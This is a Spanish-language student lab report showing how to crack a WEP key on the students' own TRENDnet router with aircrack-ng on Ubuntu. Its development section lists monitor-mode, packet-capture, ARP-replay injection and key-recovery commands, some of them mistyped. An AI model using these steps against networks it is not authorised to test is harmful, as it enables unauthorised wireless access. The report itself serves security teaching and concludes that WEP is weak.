CONTENIDO

TEMA 1

INTRODUCCIN.1

OBJETIVOS:

Objetivo General. 3

Objetivos Especficos.. 3

MARCO TERICO.. 3

DESARROLLO. 4

RESULTADOS. 18

CONCLUSIONES 19

RECOMENDACIONES. .19

REFERENCIAS.. .19
INTRODUCCIN:
El objetivo de esta prctica es demostrar que el protocolo WEP no dispone de un nivel
alto de confiabilidad para las redes wlan debido a que se usa una clave esttica que es
utilizado por varios elementos de la red. Para el desarrollo se utilizara un router de la
marca TRENET TU-639GR que ser configurado para posteriormente ser hackeado
adems se utilizar un sistema operativo Linux Ubuntu 16.04 debido a que es ms fcil
monitorear una tarjeta de red, una vez que se realiza el monitoreo se debe capturar los
paquetes de red mediante el software aircrack que facilitara el descifrado de la clave
acceso.

OBJETIVOS:

OBJETIVO GENERAL:

Realizar un descifrado de claves WEP con el fin de probar la seguridad de una red
inalmbrica y las vulnerabilidades que presenta de la misma.

OBJETIVOS ESPECFICOS:

Utilizar la herramienta aircrack para el descifrado de claves WEP de un Access

Point.
Hacer que la tarjeta de red este en modo monitor.
Obtener toda la informacin de la red mediante la captura de paquetes.
Obtener la desencriptacin de clave WEP.

MARCO TERICO

WEP (Wired Equivalent Privacy, Privacidad Equivalente al Cable) es el algoritmo

opcional de seguridad para brindar proteccin a las redes inalmbricas, incluido en la
primera versin del estndar IEEE 802.11, mantenido sin cambios en las nuevas 802,11a
y 802.11b, con el fin de garantizar compatibilidad entre distintos fabricantes. El WEP es
un sistema de encriptacin estndar implementado en la MAC y soportado por la mayora
de las soluciones inalmbricas. En ningn caso es compatible con IPSec.

El estndar IEEE 802.11 proporciona mecanismos de seguridad mediante procesos de

autenticacin y cifrado. En el modo de red Ad Hoc o conjunto de servicios avanzados, la
autenticacin puede realizarse mediante un sistema abierto o mediante clave compartida.
Una estacin de red que reciba una solicitud puede conceder la autorizacin a cualquier
estacin, o slo a aquellas que estn incluidas en una lista predefinida. En un sistema de
clave compartida, slo aquellas estaciones que posean una llave cifrada sern
autenticadas.
El estndar 802.11 especifica una capacidad opcional de cifrado denominada WEP
(Wireless Equivalent Privacy); su intencin es la de establecer un nivel de seguridad
similar al de las redes cableadas. WEP emplea el algoritmo RC4 de RSA Data Security, y
es utilizado para cifrar las transmisiones realizadas a travs del aire.
Aunque los sistemas WLAN pueden resistir las escuchas ilegales pasivas, la nica forma
efectiva de prevenir que alguien pueda comprometer los datos transmitidos consiste en
utilizar mecanismos de cifrado. El propsito de WEP es garantizar que los sistemas
WLAN dispongan de un nivel de confidencialidad equivalente al de las redes LAN
cableadas, mediante el cifrado de los datos que son transportados por las seales de radio.
Un propsito secundario de WEP es el de evitar que usuarios no autorizados puedan
acceder a las redes WLAN (es decir, proporcionar autenticacin). Este propsito
secundario no est enunciado de manera explcita en el estndar 802.11, pero se considera
una importante caracterstica del algoritmo WEP.
WEP es un elemento crtico para garantizar la confidencialidad e integridad de los datos
en los sistemas WLAN basados en el estndar 802.11, as como para proporcionar control
de acceso mediante mecanismos de autenticacin. Consecuentemente, la mayor parte de
los productos WLAN compatibles con 802.11 soportan WEP como caracterstica estndar
opcional.

El algoritmo de encriptacin de WEP

Se calcula un CRC de 32 bits de los datos. Este CRC-32 es el mtodo que propone
WEP para garantizar la integridad de los mensajes (ICV, Integrity Check Value).
Se concatena la clave secreta a continuacin del IV formado el seed.
El PRNG (Pseudo-Random Number Generator) de RC4 genera una secuencia de
caracteres pseudoaleatorios (keystream), a partir del seed, de la misma longitud
que los bits obtenidos en el punto 1.
Se calcula la O exclusiva (XOR) de los caracteres del punto 1 con los del punto
3. El resultado es el mensaje cifrado.
Se enva el IV (sin cifrar) y el mensaje cifrado dentro del campo de datos (frame
body) de la trama IEEE 802.11.
DESARROLLO
Configuracin del Access Point(AP)
Para este caso se utiliz el AP TRENDNET modelo: TU-639GR

Realizar una conexin mediante cable UTP entre el computador y el AP.

Abrir el navegador Internet Explorer y digitar la ip 192.168.10.1
Ingresamos la clave por defecto, para este caso es:
Usuario: admin, Contrasea: admin

Ingresara al interfaz grfico de configuracin del AP como se observa

 Realizar Clic en Wireless y poner un nombre del SSID en este caso: wlan

Clic en Aplicar y continue.

Dirigirse a Wireless Security configurar los siguientes parmetros
Security Mode:WEP
Key Length: 64 bit
Key Format ASCII (5 caracteres)
WEP key: clave (este caso tew24)

Clic apply y reboot.

Instalacin del sistema operativo LINUX-UBUNTU

Se procede a la instalacin del sistema operativo LINUX-Ubuntu 16.04 en la

Laptop, para la realizacin del descifrado de claves WEP.

Se debe tomar en los requisitos mnimos para poder instalar el Sistema Operativo

o Procesador Dual Core.

o 2GB de memoria RAM.
o 16GB de disco duro.
o Acceso a internet.
o Pendrive de 2 GB o ms que usaremos como medio de instalacin.
Descargar la imagen iso de Ubuntu 16.04 y montarla en una USB en modo boot
para la instalacin.
Iniciar el pc en modo arranque desde usb y proceder a la instalacin.
Seleccionamos el idioma.
 Seleccionar descargar las actualizaciones e instalar software de terceros

Crear y seleccionar la particin de disco duro con ext 4

 Seleccionar instalar ahora y se desplegara un mensaje y realizar clic en continuar

Seleccionar la zona horaria y pulsamos en continuar

 Elegimos nuestra distribucin del teclado y continuar . Existe un espacio para
que podamos escribir y comprobar que hemos elegido la opcin correcta.

Ingresar nombre de usuario y contrasea.

 Esperar que termine la instalacin y finalmente reiniciar el sistema y se ejecutara el
Sistema Operativo Ubuntu

Si toda la instalacin y el reconocimiento de la tarjeta inalmbrica se dio con xito,

se procede al ingreso al terminal de Ubuntu.

Dentro del sistema operativo se procede:

Se ingresa al terminal, se procede a entrar de modo root con el comando sudo su

y luego se ingresa la contrasea.
 Para observar las interfaces, mascara de red, la MAC de la tarjeta inalmbrica. Se
ingresa el comando ifconfig, donde da a detalle lo pensionado anteriormente

Con el comando ifconfig wlp5s0 para obtener ms a detalle sobre la direccin

Mac que se necesita
 Se procede a la instalacin de aircrack-ng, ingresando el siguiente comando apt-
get install aircrack-ng

Se procede a dar de baja a la conexin wlp5s0 con el comando ifconfig wlp5s0

down y se habilita el modo monitor ingresando airmon-ng strat wlp5s0
 Realizar un escaneo de las redes existente con el comando aireplay-ng -9
wlp5s0, observar la red especfica a hackear en este caso wlan.

Poner la interfaz en el canal especfico para esta red es cannel 6

 Realizar la captura de trfico con el comando airodump-ng channel 6 wlp5s0

Proceder a aumentar la cantidad de datos en la red digitando aireplay-

ng -3 b D8:EB:97:A6:73:AC(Direccion Mac ) h 18:cf:5e:8a:1b:6e
(Direccion Mac ) wlp5s0
 Se procede a generar el archivo ingresando el codigo airodump-ng
channel 6 w WCONTRA (nombre del archivo) ivs wlp5s0
 Con el comando dir verificar el nombre de archivo guardado.

seleccionamos la red ingresando aircrack-ng WCONTRA-ivs-01.cap

Finalizado se despliega como se observa en la figura el descifrado de la clave

WEP
RESULTADOS
Luego de realizar los procesos de descifrado se puede observar como la obtencin
la clave WEP el terminal de Ubuntu y software aircrack
CONCLUSIONES:

las claves WEP no brindan mucha seguridad pues con el programa adecuado es
fcil vulnerar esta seguridad y crackear la red.

El sistema operativo LINUX-UBUNTU permiti la realizacin de este taller se

desarrolla de una manera ms fcil, ya que con el sistema operativo WINDOWS
es ms complejo.

Con el comando ifconfig se obtiene un detalle de la red, desde las interfaces hasta
la Mac que utiliza, proporcionando la informacin necesaria para el crakeo WEP.

RECOMENDACIONES:

Ejecutar apt-get update antes de empezar con el proceso para que se actualicen las
bases de datos y as no haya problema para descargar e instalar aircrack.

Si se quiere realizar en una maquia virtual se debe tomar en cuenta que se

necesitara una tarjeta inalmbrica externa que soporte captura de paquetes, ya que
no se reconocera la tarjeta inalmbrica de la CPU.

En una instalacin fsica del sistema operativo UBUNTU se debe tener en cuenta
la tarjeta de red de la CPU, ya que algunas marcas no la detecta dicho sistema
operativo y por lo cual se debe bajar e instalar un drive.

REFERENCIAS

802.11. IEEE Std. 802.11-1997. part 11. Technical report, IEEE, 1997. Aircrack-
ng. WEP and WPA-PSK keys cracking program. http://www.aircrack-ng. org/.

Seguridad Wireless, Annimo obtenido de

http://www.seguridadwireless.net/hwagm/manual-aircrack-ng-castellano.html

W. Diffie y M. E. Hellman. New directions in cryptography. IEEE Trans.

Information Theory, IT-22(6):644654, 1976.

E. Tews. Attacks on the WEP protocol. IACR Cryptology ePrint Archive,

2007:471, 2007.